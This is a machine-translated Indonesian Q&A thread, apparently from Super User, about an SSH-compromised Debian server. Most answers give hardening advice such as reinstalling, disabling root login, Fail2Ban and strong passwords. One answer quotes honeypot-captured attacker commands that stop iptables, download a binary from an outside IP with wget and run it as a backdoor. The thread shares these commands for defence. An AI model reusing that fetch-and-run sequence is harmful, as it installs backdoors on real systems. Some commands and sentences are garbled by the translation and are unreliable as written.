Namun, jika penyerang sudah dapat menjalankan payload, mungkin ada modifikasi lain pada sistem Anda yang mungkin sulit dideteksi. Itulah mengapa penghapusan menyeluruh adalah satu-satunya opsi yang aman (dan disarankan). Seperti yang Anda sebutkan, peralatan yang dimaksud mungkin merupakan target uji / pengembangan sehingga mungkin menyeka tidak sesakit mungkin dalam kasus lain.

Memperbarui: Terlepas dari apa yang saya tulis tentang kemungkinan pemulihan, saya ingin menggemakan MariusMatutiae sangat kuat Rekomendasi untuk tidak meremehkan potensi kerusakan yang disebabkan oleh payload ini dan sejauh mana hal itu dapat mengganggu sistem target.


33
2018-02-01 21:06



Terima kasih. Saya telah memutuskan untuk menghapus sistem. Saya merestartnya beberapa kali tetapi hanya menyalin beberapa data penting. Tidak ada binari, hanya kode sumber. Saya kira saya cukup aman sekarang. - vaid
Bagaimana dengan kotak lain di LAN yang sama? - WGroleau
Pertanyaan bagus. Riwayat shell yang disediakan tidak menunjukkan upaya untuk menemukan dan kompromi kotak lain di jaringan yang sama. Lebih umum lagi, jika penyerang mendapatkan SSH (root) akses ke kotak, itu pada dasarnya berarti dia telah melewati firewall perimeter. Namun, ini tidak secara otomatis menyiratkan bahwa kotak lain dikompromikan: itu akan membutuhkan sesuatu yang lain seperti kerentanan yang tidak diatch, kata sandi dibagi antara kotak, masuk otomatis dari satu kotak ke kotak lainnya, dll. - Viktor Toth


Sshd-honeypot saya juga telah melihat serangan semacam ini. Unduhan pertama dari URL tersebut mulai 2016-01-29 10:25:33 dan serangan masih berlangsung. Serangan berasal dari

103.30.4.212
111.68.6.170
118.193.228.169

Masukan dari penyerang ini adalah:

iptables layanan berhenti
wget http://222.186.30.209:65534/yjz1
nohup / root / yjz1> / dev / null 2> & amp1 &
chmod 0777 yjz1
chmod u + x yjz1
./yjz1 &
chmod u + x yjz1
./yjz1 &
cd / tmp

Jadi tidak ada kegiatan selain menginstal backdoor untuk nanti.


17
2018-02-02 10:34



Setuju, itu adalah MO yang sama. - MariusMatutiae
@MariusMatutiae Jadi ini bukan hack manual? Ini semacam penyebaran diri cacing / bot? - NickG
@NickG Tebakan terbaik saya adalah ini bukan peretasan manual. Berapa probabilitas bahwa vaid bekerja di kantor yang sama sebagai pencetus botnet berbasis China? Seseorang menemukan kelemahan yang bisa dieksploitasi di komputernya, kemungkinan besar server ssh yang lemah dan aman, dipaksa paksa kata sandinya, memperoleh akses, mencoba memasang dirinya secara diam-diam. Namun, saya juga bertaruh bahwa penyerang lebih lancar dengan Windows daripada dengan Linux. Tapi saya tidak punya keras bukti ini, hanya tebakan. - MariusMatutiae


Semua orang di sini telah menawarkan saran yang kuat, tetapi untuk menjadi jelas, prioritas Anda harus mencadangkan dan memverifikasi apa yang benar-benar Anda butuhkan dari sistem itu, kemudian menghapusnya dengan instalasi baru dari media yang aman-dikenal.

Sebelum Anda menghubungkan host yang baru Anda pasang ke Internet, jalankan melalui ide-ide ini:

  1. Buat pengguna non-root baru, dan masuk sebagai pengguna itu. Anda tidak perlu login sebagai root, hanya sudo (pengganti pengguna) bila diperlukan.

  2. Instal SE Linux, pengaturan konfigurasi yang memungkinkan kontrol akses wajib: https://wiki.debian.org/SELinux/Setup

  3. Pertimbangkan firewall perangkat keras antara kantor / rumah Anda dan Internet. Saya menggunakan MicroTik, yang memiliki dukungan komunitas yang sangat baik: http://routerboard.com/.

Dengan asumsi Anda berada di garis waktu untuk menyelesaikan pekerjaan Anda, setidaknya lakukan # 1. # 3 cepat dan murah, tetapi Anda harus menunggu paket dalam surat, atau berkendara ke toko.


11
2018-02-01 23:32



Dan, di atas semua, jangan biarkan komputer Anda berjalan tanpa pengawasan dengan sesi root terbuka! - MariusMatutiae


  1. Aku s debian-armhf nama host Anda? Atau apakah Anda menggunakan penginstalan default dengan pengaturan default? Tidak ada masalah dengan itu, tetapi Anda tidak boleh membiarkan host secara langsung terkena Internet (tidak dilindungi oleh modem Anda, setidaknya).

  2. Sepertinya masalah sebenarnya berasal 222.186.30.209 (Lihat http://anti-hacker-alliance.com/index.php?ip=222.186.30.209). Anda tidak perlu membayar banyak perhatian untuk melihat IP Microsoft. IP dapat lebih sedikit dipalsukan / palsu dengan mudah.

  3. Cara biasa untuk terhubung ke Internet adalah meneruskan daftar port yang dikenal dari IP publik Anda (misalnya 8.8.8.8) ke lokal Anda (misalnya 192.168.1.12).

    • Misalnya, jangan teruskan semua koneksi masuk 8.8.8.8 (publik) ke 192.168.1.12 (lokal).

    • Meneruskan hanya port 22 dan 25 (ssh dan surat masuk, masing-masing). Anda harus, tentu saja, memiliki yang terbaru ssh dan smtp paket / pustaka juga.

  4. Apa berikutnya? Putuskan sambungan host, dan ubah kata sandi (pada komputer apa pun yang terkait dengan organisasi) yang dikodekan ulang dalam skrip shell (malu pada Anda!) Di /etc/shadow.


11
2018-02-01 13:03



1. Ya debian-armhf adalah nama host. 2. Ya, saya telah membaca artikel itu, dan saya menghubungi Microsoft melalui situs web mereka cest.microsoft.com. 3. Saya hanya meneruskan 25 dan 22, tidak ada yang lain yang diteruskan. 4. Saya akan melakukannya - vaid
"IP bisa palsu lebih mudah atau kurang": Saya bukan ahli keamanan atau jaringan. Bagaimana mungkin? - kevinarpe
@kevinarpe Itu mungkin jauh lebih baik sebagai pertanyaan terpisah. - Michael Kjörling
Lihat stackoverflow.com/questions/5180557/… dan superuser.com/questions/37687/… - Archemar
@Archemar: SSH adalah TCP; memalsukan IP sumber TCP sulit jika tidak mustahil. Plus, sebagaimana ditetapkan di atas, Microsoft IP milik layanan cloud mereka Azure, yang berarti siapa pun bisa saja membeli waktu di layanan untuk menyerang orang lain. - nneonneo


Seperti yang dinyatakan orang lain, cukup jelas keamanan server Anda telah dikompromikan. Hal yang paling aman adalah menghapus mesin ini dan menginstal ulang.

Untuk menjawab bagian kedua dari pertanyaan Anda, jika Anda tidak dapat menggunakan auth kunci publik, saya sarankan setidaknya mengatur Fail2Ban dan menjalankan SSH pada port non-standar. Saya juga menonaktifkan akses SSH root.

Fail2Ban akan membantu mengurangi serangan brute-force dengan melarang alamat IP yang gagal masuk dalam jumlah tertentu kali.

Pengaturan sshd untuk mendengarkan pada port non-standar setidaknya akan membantu mengurangi visibilitas server SSH Anda sedikit. Menonaktifkan logon root juga mengurangi sedikit profil serangan. Di /etc/sshd_config:

PermitRootLogin no
Port xxxxx

Dengan login root dinonaktifkan Anda harus beralih ke root su setelah Anda terhubung, atau (lebih disukai) gunakan sudo untuk menjalankan perintah istimewa.


9
2018-02-02 16:58



Saya telah melakukan keduanya, terima kasih atas sarannya. - vaid


Server SSH terus diserang di internet. Beberapa hal yang Anda lakukan:

  1. Pastikan Anda menggunakan kata sandi acak yang sangat aman, untuk mesin yang dapat diakses internet. Maksud saya seperti 16 karakter atau lebih dan sepenuhnya acak. Gunakan pengelola kata sandi sehingga Anda tidak perlu menghafalnya. Jika Anda dapat menghafal kata sandi Anda, itu terlalu sederhana.

  2. Jika Anda tidak membutuhkan SSH, matikan. Jika Anda memang membutuhkannya, tetapi tidak perlu dapat diakses secara publik, jalankan pada nomor port yang tinggi dan tidak standar. Melakukan hal ini akan secara dramatis mengurangi upaya peretasan. Ya, peretas yang berdedikasi dapat melakukan pemindaian port, tetapi bot otomatis tidak akan menemukannya.

Cuplikan dari log auth Anda menunjukkan upaya yang gagal. Namun jika Anda melihat lebih jauh Anda tidak akan ragu melihat login yang sukses. Itu Anda menggunakan kata sandi sederhana, maka itu sepele untuk bot untuk masuk.

Anda perlu mengisolasi mesin ini dari jaringan. Sangat hati-hati mendapatkan apa yang Anda butuhkan dari itu, dan kemudian bersihkan.


8
2018-02-01 23:51



Ketika saya menjalankan ssh pada port 22, saya biasanya akan memiliki ribuan percobaan hack per hari. Ketika saya mengubah ke nomor port yang tinggi (lebih dari 50000), upaya retas ini benar-benar berhenti. - user1751825
16 karakter tidak cukup aman. Keluar pengguna juga berguna. Hanya saja, jangan menjadikannya penguncian perm, membuatnya kedaluwarsa, tetapi jadikan itu seperti satu jam. Dengan cara ini Anda masih dapat mengakses server. - Ramhound
Perhatikan bahwa langkah 2) tidak benar-benar diperlukan untuk keamanan, selama Anda memiliki otentikasi yang kuat (kunci publik, atau kata sandi yang kuat). - user20574
@Ramhound Kenapa tidak? Bahkan jika itu hanya huruf kecil, 16 huruf kecil memberikan kemungkinan 43608742899428874059776, yang tidak praktis untuk brute-force, terutama untuk kekuatan brute online di mana server membuat Anda menunggu setiap kali Anda gagal dalam upaya. - user20574
@ pengguna20574. Meskipun tidak benar-benar diperlukan, mengurangi visibilitas layanan SSH masih sangat membantu. Bahkan jika tidak ada alasan lain selain untuk menghilangkan kekacauan dari log Anda. Jika mesin hanya perlu diakses oleh sekelompok orang terbatas, maka port non-standar adalah langkah yang masuk akal untuk meningkatkan keamanan. - user1751825


Hal pertama yang harus dilakukan setiap orang / setiap orang setelah menyiapkan server Linux / Unix yang menghadap ke depan adalah segera menonaktifkannya root.

Sistem Anda dikompromikan. Anda memiliki log riwayat berjalan yang mungkin keren untuk dilihat sampai batas tertentu. Tetapi secara jujur ​​membedah spesifikasinya agak sedikit pilih-pilih dan tidak akan membantu Anda mengamankan server Anda. Ini menunjukkan semua jenis omong kosong yang terjadi ketika botnet menelurkan malware — yang kemungkinan besar yang menginfeksi server Anda — menginfeksi sistem Linux. Itu jawaban yang diberikan oleh @MariusMatutiae baik dan dipikirkan dengan baik dan ada orang lain yang mengulangi bahwa Anda diretas via root akses yang merupakan mimpi basah malware / botnet.

Ada beberapa penjelasan tentang cara menonaktifkan root tetapi saya akan menyatakan dari pengalaman pribadi, hampir semua hal yang melampaui apa yang akan saya jelaskan sekarang adalah berlebihan. Ini adalah kamu harus telah dilakukan saat Anda pertama kali menyiapkan server:

  1. Buat pengguna baru dengan sudo hak: Buat pengguna baru dengan nama baru — sesuatu seperti cooldude-Menggunakan perintah seperti sudo adduser cooldude jika Anda menggunakan Ubuntu atau jenis lain dari sistem Debian. Maka hanya secara manual mengedit sudo file menggunakan perintah seperti ini sudo nano /etc/sudoers dan tambahkan garis seperti cooldude ALL=(ALL:ALL) ALL di bawah garis ekuivalen yang harus dibaca root ALL=(ALL:ALL) ALL. Dengan melakukannya, masuk sebagai cooldude dan menguji sudo perintah dengan perintah seperti sudo w—Sesuatu yang mendasar dan tidak merusak — untuk melihat apakah sudo kerja hak. Anda mungkin diminta untuk memasukkan kata sandi. Itu bekerja? Semuanya bagus! Pindah ke langkah selanjutnya.
  2. Kunci root rekening: Oke, sekarang cooldude bertanggung jawab dengan sudo hak, masuk sebagai cooldude dan jalankan perintah ini untuk mengunci akun root sudo passwd -l root. Jika entah bagaimana Anda telah membuat pasangan kunci SSH untuk root, buka /root/.ssh/authorized_keys dan lepaskan kunci. Atau lebih baik lagi, cukup ganti nama file itu authorized_keys_OFF seperti ini, sudo mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_OFF untuk secara efektif menonaktifkan kunci SSH. Saya lebih suka nanti karena pada kesempatan off-hand Anda masih perlu login password kurang, Anda dapat memindahkan file itu kembali ke nama asli dan Anda harus baik untuk pergi.

FWIW, saya telah mengelola lusinan server Linux selama bertahun-tahun (dekade?) Dan tahu dari pengalaman yang hanya melumpuhkan root—Dan siapkan pengguna baru sudo rights — adalah cara paling sederhana dan paling dasar untuk mengamankan sistem Linux apa pun. Saya tidak pernah berurusan dengan jenis kompromi apa pun melalui SSH satu kali root dinonaktifkan. Dan ya, Anda mungkin melihat upaya untuk masuk melalui auth.log tetapi mereka tidak ada artinya; jika root dinonaktifkan maka upaya tersebut tidak akan pernah menambah apa pun. Cukup duduk dan saksikan upaya tanpa henti gagal!


6
2018-02-07 02:34